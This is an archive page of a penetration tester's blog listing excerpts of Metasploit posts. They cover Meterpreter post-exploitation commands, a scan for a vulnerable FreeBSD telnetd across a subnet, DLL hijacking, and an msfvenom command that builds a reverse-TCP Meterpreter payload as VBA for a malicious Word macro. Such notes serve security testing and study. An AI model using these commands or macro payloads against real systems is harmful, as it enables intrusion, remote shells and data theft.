metasploit

Older posts

BT5r2 fixes and installs of missing bits

Published March 7, 2012 | By phillips321

Just downloaded and started playing with BackTrack 5 R2 but there is still plenty of tools missing, you would have thought they would have took a look at my script and added most of the bits I have fixed in my script… what do they do with their time???

Anyway, until I update the bt5-fixit.sh script to work with BT5r2 I have quickly put together a list of my… Continue reading

Posted in Linux, metasploit | Tagged , , , , , | 16 Comments

Post Exploit Commands

Published February 7, 2012 | By phillips321

Credit for most of the below comes from Mubix who has created a few documents (on google docs) that lists what to actually do once shell access has been gained. You can read more about it here and find the links to the docs, I’m simply blogging about it to make a summary of this for myself.

Meterpreter Post Auth

Information Gathering

12345678910getuid getpid getsprivs sysinfo screenshot run winenum.rb run… Continue reading
Posted in Linux, metasploit, Networking | Tagged , , , , , , | Leave a comment

FreeBSD Derived telnetd service Exploit

Published January 18, 2012 | By phillips321

Mentioned by hdm here and here but I wanted to make a note of this myself. First thing to do is setup the scan to look for vulnerable telnetd services:

12345msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24 RHOSTS => 192.168.0.0/24 msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64 THREADS => 64

And now to run the scan

123456789101112131415msf  auxiliary(telnet_encrypt_overflow) > run [*] 192.168.0.1:23 Does not support encryption: Netgear Embedded… Continue reading
Posted in metasploit, Networking | Tagged , , , , | Leave a comment

DLL Hijacking

Published December 19, 2011 | By phillips321

So it’s been spoken of alot but i’d never actually got around to trying it. A colleague has been banging on about it for weeks and before he got chance to play with it a second colleague managed to use this in the wild. Sweet! I decided it would be worth playing with in order to have a go at creating my own DLL and seeing what is vulnerable on… Continue reading

Posted in metasploit, Uncategorized | Tagged , , , , | Leave a comment

Dirty office documents

Published December 14, 2011 | By phillips321

So you want/need a malicious word document in order to own a target, step in metasploit.

The first thing you’ll need to do is create the code that you’ll copy&paste into your word document.

1./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba > vbcode.txt

The output will contain 2 blocks of code; the macro and the data.

Open a new word document and Press Alt+F11 in order to open “Microsoft Visual… Continue reading

Posted in Linux, metasploit, Uncategorized | Tagged , , , , , , | Leave a comment
Older posts

Please feel free to share my content but always link back here :-)